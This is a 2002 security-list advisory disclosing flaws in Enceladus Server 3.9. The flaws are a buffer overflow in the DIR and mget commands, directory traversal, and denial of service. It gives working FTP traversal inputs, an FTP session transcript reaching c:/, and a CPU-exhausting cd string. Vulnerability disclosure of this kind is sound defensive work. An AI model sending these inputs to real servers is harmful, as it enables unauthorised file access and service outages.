[NT] Multiple Vulnerabilities in Enceladus Server (cd, dir, mget)

• Previous message: support@securiteam.com: "[NT] Hyperion FTP Server Buffer Overflow (dir)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 25 Dec 2002 11:03:42 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -

  Multiple Vulnerabilities in Enceladus Server (cd, dir, mget)
------------------------------------------------------------------------

SUMMARY

 <http://www.mollensoft.com/> Enceladus Server Suite is an
Internet/Intranet lightweight Web and FTP Server for Windows, provides
secure file sharing on any network. Perfect for Broadband, Cable Modem,
Small business and Personal Use. You don't have to be an expert to setup
file sharing or run your own web site and FTP Server. This Server Suite is
one of the Easiest to install and operate.

Three security vulnerabilities have been found in the product, a buffer
overflow, a directory traversal, and denial of service attack.

DETAILS

Vulnerable systems:
 * Enceladus Server version 3.9

Securma found several vulnerability critical concerning this server:

1) Buffer overflow and remote code execution:

The "DIR" with a long directory name allows a remote attacker to overwrite
the EIP register, where dir+[buffer =279byte] causes the EIP to get
overwritten.

The same happens with the "mget" command.

2) Directory traversal

ftp>cd ..
access denied
ftp>cd cd @/....\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
drwxr-xr-x 1 User Group 0 Dec 18 12:59 anonymous- ftp
drwxr-xr-x 1 User Group 0 Dec 18 12:59 downloads
-rwxr-xr-x 1 User Group 8544 Mar 18 02:09 emailme.html
-rwxr-xr-x 1 User Group 878 Mar 16 04:52 execupload.html
-rwxr-xr-x 1 User Group 1033 Oct 27 02:22 exitstatus.html
-rwxr-xr-x 1 User Group 5965 Mar 18 02:12 fileuplogin.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 ftproot
drwxr-xr-x 1 User Group 0 Dec 18 12:59 images
-rwxr-xr-x 1 User Group 6783 Mar 18 02:11 index.html
-rwxr-xr-x 1 User Group 4465 Mar 18 02:09 Links.html
-rwxr-xr-x 1 User Group 1299 Mar 18 23:41 mailexitstatus.html
-rwxr-xr-x 1 User Group 4402 Mar 18 02:09 MyPictures.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 secure- downloads
-rwxr-xr-x 1 User Group 5082 Mar 18 02:09 signguestbook.html
-rwxr-xr-x 1 User Group 5188 Mar 18 02:09 upload.html
ftp> cd @@@@@@@@@@@/..c:\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> pwd
257 "c:/" is current directory.
ftp> dir

3) Denial of service and CPU consumption
ftp> cd @/..@/..
(no response)
99% of the CPU time is used

ADDITIONAL INFORMATION

The information has been provided by <mailto:securma@caramail.com>
securma massine.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Next message: support@securiteam.com: "[UNIX] zkfingerd Format String Vulnerability"
• Previous message: support@securiteam.com: "[NT] Hyperion FTP Server Buffer Overflow (dir)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]